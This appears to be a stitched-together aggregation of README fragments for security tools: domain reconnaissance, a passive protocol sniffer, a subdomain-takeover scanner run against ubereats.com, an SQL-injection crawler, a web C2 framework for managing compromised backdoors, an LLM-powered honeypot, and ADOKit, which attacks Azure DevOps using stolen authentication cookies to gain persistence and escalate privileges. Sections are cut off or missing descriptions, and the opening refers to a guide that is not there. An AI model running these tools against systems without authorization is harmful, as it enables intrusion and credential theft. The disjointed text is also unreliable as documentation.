By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.
Num | Detector | What it Detects | Impact | Confidence |
---|---|---|---|---|
1 | ai-anomaly-detection | Detect anomalous code patterns using advanced AI models | High | High |
2 | ai-vulnerability-prediction | Predict potential vulnerabilities using machine learning | High | High |
3 | ai-code-optimization | Suggest code optimizations based on AI-driven analysis | Medium | High |
4 | ai-contract-complexity | Assess contract complexity and maintainability using AI | Medium | High |
5 | ai-gas-optimization | Identify gas-optimizing opportunities with AI | Medium | Medium |
## Detectors |
Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.
Current features (v1.0.1)- - Subdomain enumeration (2 engines + bruteforcing) - User-friendly output - Resolving A records (IPv4)
A few features are work in progress. See Planned features for more details.
The project is inspired by Sublist3r. The port scanner module is heavily based on NimScan.
You can build this repo from source- - Clone the repository
git clone git@github.com:pptx704/domainim
nimble build
./domainim <domain> [--ports=<ports>]
Or, you can just download the binary from the release page. Keep in mind that the binary is tested on Debian based systems only.
./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
<domain>
is the domain to be enumerated. It can be a subdomain as well.-- ports | -p
is a string speicification of the ports to be scanned. It can be one of the following-all
- Scan all ports (1-65535)none
- Skip port scanning (default)t<n>
- Scan top n ports (same as nmap
). i.e. t100
scans top 100 ports. Max value is 5000. If n is greater than 5000, it will be set to 5000.80
scans port 8080-100
scans ports 80 to 10080,443,8080
scans ports 80, 443 and 808080,443,8080-8090,t500
scans ports 80, 443, 8080 to 8090 and top 500 ports--dns | -d
is the address of the dns server. This should be a valid IPv4 address and can optionally contain the port number-a.b.c.d
- Use DNS server at a.b.c.d
on port 53a.b.c.d#n
- Use DNS server at a.b.c.d
on port e
--wordlist | -l
- Path to the wordlist file. This is used for bruteforcing subdomains. If the file is invalid, bruteforcing will be skipped. You can get a wordlist from SecLists. A wordlist is also provided in the release page.--rps | -r
- Number of requests to be made per second during bruteforce. The default value is 1024 req/s
. It is to be noted that, DNS queries are made in batches and next batch is made only after the previous one is completed. Since quries can be rate limited, increasing the value does not always guarantee faster results.--out | -o
- Path to the output file. The output will be saved in JSON format. The filename must end with .json
.Examples - ./domainim nmap.org --ports=all
- ./domainim google.com --ports=none --dns=8.8.8.8#53
- ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500
- ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --outfile=results.json
- ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1
The help menu can be accessed using ./domainim --help
or ./domainim -h
.
Usage:
domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
domainim (-h | --help)
Options:
-h, --help Show this screen.
-p, --ports Ports to scan. [default: `none`]
Can be `all`, `none`, `t<n>`, single value, range value, combination
-l, --wordlist Wordlist for subdomain bruteforcing. Bruteforcing is skipped for invalid file.
-d, --dns IP and Port for DNS Resolver. Should be a valid IPv4 with an optional port [default: system default]
-r, --rps DNS queries to be made per second [default: 1024 req/s]
-o, --out JSON file where the output will be saved. Filename must end with `.json`
Examples:
domainim domainim.com -p:t500 -l:wordlist.txt --dns:1.1.1.1#53 --out=results.json
domainim sub.domainim.com --ports=all --dns:8.8.8.8 -t:1500 -o:results.json
The JSON schema for the results is as follows-
[
{
"subdomain": string,
"data": [
"ipv4": string,
"vhosts": [string],
"reverse_dns": string,
"ports": [int]
]
}
]
Example json for nmap.org
can be found here.
Contributions are welcome. Feel free to open a pull request or an issue.
This project is still in its early stages. There are several limitations I am aware of.
The two engines I am using (I'm calling them engine because Sublist3r does so) currently have some sort of response limit. dnsdumpster.com">dnsdumpster can fetch upto 100 subdomains. crt.sh also randomizes the results in case of too many results. Another issue with crt.sh is the fact that it returns some SQL error sometimes. So for some domain, results can be different for different runs. I am planning to add more engines in the future (at least a brute force engine).
The port scanner has only ping response time + 750ms
timeout. This might lead to false negatives. Since, domainim is not meant for port scanning but to provide a quick overview, such cases are acceptable. However, I am planning to add a flag to increase the timeout. For the same reason, filtered ports are not shown. For more comprehensive port scanning, I recommend using Nmap. Domainim also doesn't bypass rate limiting (if there is any).
It might seem that the way vhostnames are printed, it just brings repeition on the table.
Printing as the following might've been better-
ack.nmap.org, issues.nmap.org, nmap.org, research.nmap.org, scannme.nmap.org, svn.nmap.org, www.nmap.org
β³ 45.33.49.119
β³ Reverse DNS: ack.nmap.org.
But previously while testing, I found cases where not all IPs are shared by same set of vhostnames. That is why I decided to keep it this way.
DNS server might have some sort of rate limiting. That's why I added random delays (between 0-300ms) for IPv4 resolving per query. This is to not make the DNS server get all the queries at once but rather in a more natural way. For bruteforcing method, the value is between 0-1000ms by default but that can be changed using --rps | -t
flag.
One particular limitation that is bugging me is that the DNS resolver would not return all the IPs for a domain. So it is necessary to make multiple queries to get all (or most) of the IPs. But then again, it is not possible to know how many IPs are there for a domain. I still have to come up with a solution for this. Also, nim-ndns
doesn't support CNAME records. So, if a domain has a CNAME record, it will not be resolved. I am waiting for a response from the author for this.
For now, bruteforcing is skipped if a possible wildcard subdomain is found. This is because, if a domain has a wildcard subdomain, bruteforcing will resolve IPv4 for all possible subdomains. However, this will skip valid subdomains also (i.e. scanme.nmap.org
will be skipped even though it's not a wildcard value). I will add a --force-brute | -fb
flag later to force bruteforcing.
Similar thing is true for VHost enumeration for subdomain inputs. Since, urls that ends with given subdomains are returned, subdomains of similar domains are not considered. For example, scannme.nmap.org
will not be printed for ack.nmap.org
but something.ack.nmap.org
might be. I can search for all subdomains of nmap.org
but that defeats the purpose of having a subdomains as an input.
MIT License. See LICENSE for full text.
Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.
Above: Invisible network protocol sniffer
Designed for pentesters and security engineers
Author: Magama Bazarov, <caster@exploit.org>
Pseudonym: Caster
Version: 2.6
Codename: Introvert
All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.
It is a specialized network security tool that helps both pentesters and security professionals.
Above is a invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise on the air. He's invisible. Completely based on the Scapy library.
Above allows pentesters to automate the process of finding vulnerabilities in network hardware. Discovery protocols, dynamic routing, 802.1Q, ICS Protocols, FHRP, STP, LLMNR/NBT-NS, etc.
Detects up to 27 protocols:
MACSec (802.1X AE)
EAPOL (Checking 802.1X versions)
ARP (Passive ARP, Host Discovery)
CDP (Cisco Discovery Protocol)
DTP (Dynamic Trunking Protocol)
LLDP (Link Layer Discovery Protocol)
802.1Q Tags (VLAN)
S7COMM (Siemens)
OMRON
TACACS+ (Terminal Access Controller Access Control System Plus)
ModbusTCP
STP (Spanning Tree Protocol)
OSPF (Open Shortest Path First)
EIGRP (Enhanced Interior Gateway Routing Protocol)
BGP (Border Gateway Protocol)
VRRP (Virtual Router Redundancy Protocol)
HSRP (Host Standby Redundancy Protocol)
GLBP (Gateway Load Balancing Protocol)
IGMP (Internet Group Management Protocol)
LLMNR (Link Local Multicast Name Resolution)
NBT-NS (NetBIOS Name Service)
MDNS (Multicast DNS)
DHCP (Dynamic Host Configuration Protocol)
DHCPv6 (Dynamic Host Configuration Protocol v6)
ICMPv6 (Internet Control Message Protocol v6)
SSDP (Simple Service Discovery Protocol)
MNDP (MikroTik Neighbor Discovery Protocol)
Above works in two modes:
The tool is very simple in its operation and is driven by arguments:
.pcap
as input and looks for protocols in it.pcap
file, its name you specify yourselfusage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]
options:
-h, --help show this help message and exit
--interface INTERFACE
Interface for traffic listening
--timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
--output OUTPUT File name where the traffic will be recorded
--input INPUT File name of the traffic dump
--passive-arp Passive ARP (Host Discovery)
The information obtained will be useful not only to the pentester, but also to the security engineer, he will know what he needs to pay attention to.
When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:
Impact: What kind of attack can be performed on this protocol;
Tools: What tool can be used to launch an attack;
Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.
Mitigation: Recommendations for fixing the security problems
Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses
You can install Above directly from the Kali Linux repositories
caster@kali:~$ sudo apt update && sudo apt install above
Or...
caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
caster@kali:~$ git clone https://github.com/casterbyte/Above
caster@kali:~$ cd Above/
caster@kali:~/Above$ sudo python3 setup.py install
# Install python3 first
brew install python3
# Then install required dependencies
sudo pip3 install scapy colorama setuptools
# Clone the repo
git clone https://github.com/casterbyte/Above
cd Above/
sudo python3 setup.py install
Don't forget to deactivate your firewall on macOS!
Above requires root access for sniffing
Above can be run with or without a timer:
caster@kali:~$ sudo above --interface eth0 --timer 120
To stop traffic sniffing, press CTRL + Π‘
WARNING! Above is not designed to work with tunnel interfaces (L3) due to the use of filters for L2 protocols. Tool on tunneled L3 interfaces may not work properly.
Example:
caster@kali:~$ sudo above --interface eth0 --timer 120
-----------------------------------------------------------------------------------------
[+] Start sniffing...
[*] After the protocol is detected - all necessary information about it will be displayed
--------------------------------------------------
[+] Detected SSDP Packet
[*] Attack Impact: Potential for UPnP Device Exploitation
[*] Tools: evil-ssdp
[*] SSDP Source IP: 192.168.0.251
[*] SSDP Source MAC: 02:10:de:64:f2:34
[*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
--------------------------------------------------
[+] Detected MDNS Packet
[*] Attack Impact: MDNS Spoofing, Credentials Interception
[*] Tools: Responder
[*] MDNS Spoofing works specifically against Windows machines
[*] You cannot get NetNTLMv2-SSP from Apple devices
[*] MDNS Speaker IP: fe80::183f:301c:27bd:543
[*] MDNS Speaker MAC: 02:10:de:64:f2:34
[*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
--------------------------------------------------
If you need to record the sniffed traffic, use the --output
argument
caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap
If you interrupt the tool with CTRL+C, the traffic is still written to the file
If you already have some recorded traffic, you can use the --input
argument to look for potential security issues
caster@kali:~$ above --input ospf-md5.cap
Example:
caster@kali:~$ sudo above --input ospf-md5.cap
[+] Analyzing pcap file...
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 10.0.0.1
[*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 192.168.0.2
[*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
The tool can detect hosts without noise in the air by processing ARP frames in passive mode
caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10
[+] Host discovery using Passive ARP
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.88
[*] MAC Address: 00:00:0c:07:ac:c8
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.40
[*] MAC Address: 00:0c:29:c5:82:81
--------------------------------------------------
I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.
Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a CNAME in the DNS, but no host is providing content for it. Subhunter takes a given list of Subdomains" title="Subdomains">subdomains and scans them to check this vulnerability.
Download from releases
Build from source:
$ git clone https://github.com/Nemesis0U/Subhunter.git
$ go build subhunter.go
Usage of subhunter:
-l string
File including a list of hosts to scan
-o string
File to save results
-t int
Number of threads for scanning (default 50)
-timeout int
Timeout in seconds (default 20)
./Subhunter -l subdomains.txt -o test.txt
____ _ _ _
/ ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
\___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
|____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|
A fast subdomain takeover tool
Created by Nemesis
Loaded 88 fingerprints for current scan
-----------------------------------------------------------------------------
[+] Nothing found at www.ubereats.com: Not Vulnerable
[+] Nothing found at testauth.ubereats.com: Not Vulnerable
[+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
[+] Nothing found at about.ubereats.com: Not Vulnerable
[+] Nothing found at beta.ubereats.com: Not Vulnerable
[+] Nothing found at ewp.ubereats.com: Not Vulnerable
[+] Nothi ng found at edgetest.ubereats.com: Not Vulnerable
[+] Nothing found at guest.ubereats.com: Not Vulnerable
[+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
[+] Nothing found at info.ubereats.com: Not Vulnerable
[+] Nothing found at learn.ubereats.com: Not Vulnerable
[+] Nothing found at merchants.ubereats.com: Not Vulnerable
[+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
[+] Nothing found at messages.ubereats.com: Not Vulnerable
[+] Nothing found at order.ubereats.com: Not Vulnerable
[+] Nothing found at restaurants.ubereats.com: Not Vulnerable
[+] Nothing found at payments.ubereats.com: Not Vulnerable
[+] Nothing found at static.ubereats.com: Not Vulnerable
Subhunter exiting...
Results written to test.txt
Download the binaries
or build the binaries and you are ready to go:
$ git clone https://github.com/Nemesis0U/PingRAT.git
$ go build client.go
$ go build server.go
./server -h
Usage of ./server:
-d string
Destination IP address
-i string
Listener (virtual) Network Interface (e.g. eth0)
./client -h
Usage of ./client:
-d string
Destination IP address
-i string
(Virtual) Network Interface (e.g., eth0)
SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
bash pip3 install sqlmc
Run sqlmc
with the following command-line arguments:
-u, --url
: The URL to scan (required)-d, --depth
: The depth to scan (required)-o, --output
: The output file to save the resultsExample usage:
sqlmc -u http://example.com -d 2
Replace http://example.com with the URL you want to scan and 3 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.
The tool will then perform the scan and display the results.
This project is licensed under the GNU Affero General Public License v3.0.
The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.
C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.
Reverse shells support:
C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk
π Anywhere Access: Reach the C2 Cloud from any location.
π Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
π±οΈ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
π Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.
π οΈ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
π TCP Socket: Serving reverse TCP requests for enhanced functionality.
π Nginx: Effortlessly routing traffic between web and backend systems.
π¨ Redis PubSub: Serving as a robust message broker for seamless communication.
π Websockets: Delivering real-time updates to browser clients for enhanced user experience.
πΎ Postgres DB: Ensuring persistent storage for seamless continuity.
Reverse TCP port: 8888
Clone the repo
Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.
Distributed under the MIT License. See LICENSE for more information.
TL;DR: Galah (/Ι‘ΙΛlΙΛ/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.
Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!
I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.
The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.
Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.
Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.
Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.
Support for Other LLMs.
config.yaml
file.% git clone git@github.com:0x4D31/galah.git
% cd galah
% go mod download
% go build
% ./galah -i en0 -v
ββββββ βββββ ββ βββββ ββ ββ
ββ ββ ββ ββ ββ ββ ββ ββ
ββ βββ βββββββ ββ βββββββ βββββββ
ββ ββ ββ ββ ββ ββ ββ ββ ββ
ββββββ ββ ββ βββββββ ββ ββ ββ ββ
llm-based web honeypot // version 1.0
author: Adel "0x4D31" Karimi
2024/01/01 04:29:10 Starting HTTP server on port 8080
2024/01/01 04:29:10 Starting HTTP server on port 8888
2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned
2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
2024/01/01 04:35:59 Sending the crafted response to [::1]:65434
^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
2024/01/01 04:39:27 All servers shut down gracefully.
Here are some example responses:
% curl http://localhost:8080/login.php
<!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>
JSON log record:
{"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}
% curl http://localhost:8080/.aws/credentials
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
region = us-west-2
JSON log record:
{"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}
Okay, that was impressive!
Now, let's do some sort of adversarial testing!
% curl http://localhost:8888/are-you-a-honeypot
No, I am a server.`
JSON log record:
{"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}
π
% curl http://localhost:8888/i-mean-are-you-a-fake-server`
No, I am not a fake server.
JSON log record:
{"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}
You're a galah, mate!
bash git clone https://github.com/your_username/status-checker.git cd status-checker
bash pip install -r requirements.txt
python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
-d
, --domain
: Single domain/URL to check.-l
, --list
: File containing a list of domains/URLs to check.-o
, --output
: File to save the output.-v
, --version
: Display version information.-update
: Update the tool.Example:
python status_checker.py -l urls.txt -o results.txt
This project is licensed under the MIT License - see the LICENSE file for details.
This tool compilation is carefully crafted with the purpose of being useful both for the beginners and veterans from the malware analysis world. It has also proven useful for people trying their luck at the cracking underworld.
It's the ideal complement to be used with the manuals from the site, and to play with the numbered theories mirror.
To be clear, this pack is thought to be the most complete and robust in existence. Some of the pros are:
It contains all the basic (and not so basic) tools that you might need in a real life scenario, be it a simple or a complex one.
The pack is integrated with an Universal Updater made by us from scratch. Thanks to that, we get to mantain all the tools in an automated fashion.
It's really easy to expand and modify: you just have to update the file bin\updater\tools.ini
to integrate the tools you use to the updater, and then add the links for your tools to bin\sendto\sendto
, so they appear in the context menus.
The installer sets up everything we might need automatically - everything, from the dependencies to the environment variables, and it can even add a scheduled task to update the whole pack of tools weekly.
You can simply download the stable versions from the release section, where you can also find the installer.
Once downloaded, you can update the tools with the Universal Updater that we specifically developed for that sole purpose.
You will find the binary in the folder bin\updater\updater.exe
.
This toolkit is composed by 98 apps that cover everything we might need to perform reverse engineering and binary/malware analysis.
Every tool has been downloaded from their original/official websites, but we still recommend you to use them with caution, specially those tools whose official pages are forum threads. Always exercise common sense.
You can check the complete list of tools here.
Pull Requests are welcome. If you'd want to propose big changes, you should first create an Issue about it, so we all can analyze and discuss it. The tools are compressed with 7-zip, and the format used for nomenclature is {name} - {version}.7z
Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.
Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.
The below 3rd party libraries are used in this project.
Library | URL | License |
---|---|---|
Fody | https://github.com/Fody/Fody | MIT License |
Newtonsoft.Json | https://github.com/JamesNK/Newtonsoft.Json | MIT License |
Take the below steps to setup Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.
https://api.nuget.org/v3/index.json
Install-Package Costura.Fody -Version 3.3.3
Install-Package Newtonsoft.Json
Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.
UserAuthentication
cookie on a user's machine for the .dev.azure.com
domain./credential:UserAuthentication=ABC123
/credential:apiToken
The below table shows the permissions required for each module.
Attack Scenario | Module | Special Permissions? | Notes |
---|---|---|---|
Recon | check | No | |
Recon | whoami | No | |
Recon | listrepo | No | |
Recon | searchrepo | No | |
Recon | listproject | No | |
Recon | searchproject | No | |
Recon | searchcode | No | |
Recon | searchfile | No | |
Recon | listuser | No | |
Recon | searchuser | No | |
Recon | listgroup | No | |
Recon | searchgroup | No | |
Recon | getgroupmembers | No | |
Recon | getpermissions | No | |
Persistence | createpat | No | |
Persistence | listpat | No | |
Persistence | removepat | No | |
Persistence | createsshkey | No | |
Persistence | listsshkey | No | |
Persistence | removesshkey | No | |
Privilege Escalation | addprojectadmin | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removeprojectadmin | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | addbuildadmin | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removebuildadmin | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | addcollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removecollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | addcollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removecollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | addcollectionbuildsvc | Yes - Project Collection Administrator , Project Colection Build Administrators or Project Collection Service Accounts
| |
Privilege Escalation | removecollectionbuildsvc | Yes - Project Collection Administrator , Project Colection Build Administrators or Project Collection Service Accounts
| |
Privilege Escalation | addcollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removecollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | getpipelinevars | Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
| |
Privilege Escalation | getpipelinesecrets | Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
| |
Privilege Escalation | getserviceconnections | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
|
Perform authentication check to ensure that organization is using Azure DevOps and that provided credentials are valid.
Provide the check
module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.
ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: check
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/28/2023 3:33:01 PM
==================================================
[*] INFO: Checking if organization provided uses Azure DevOps
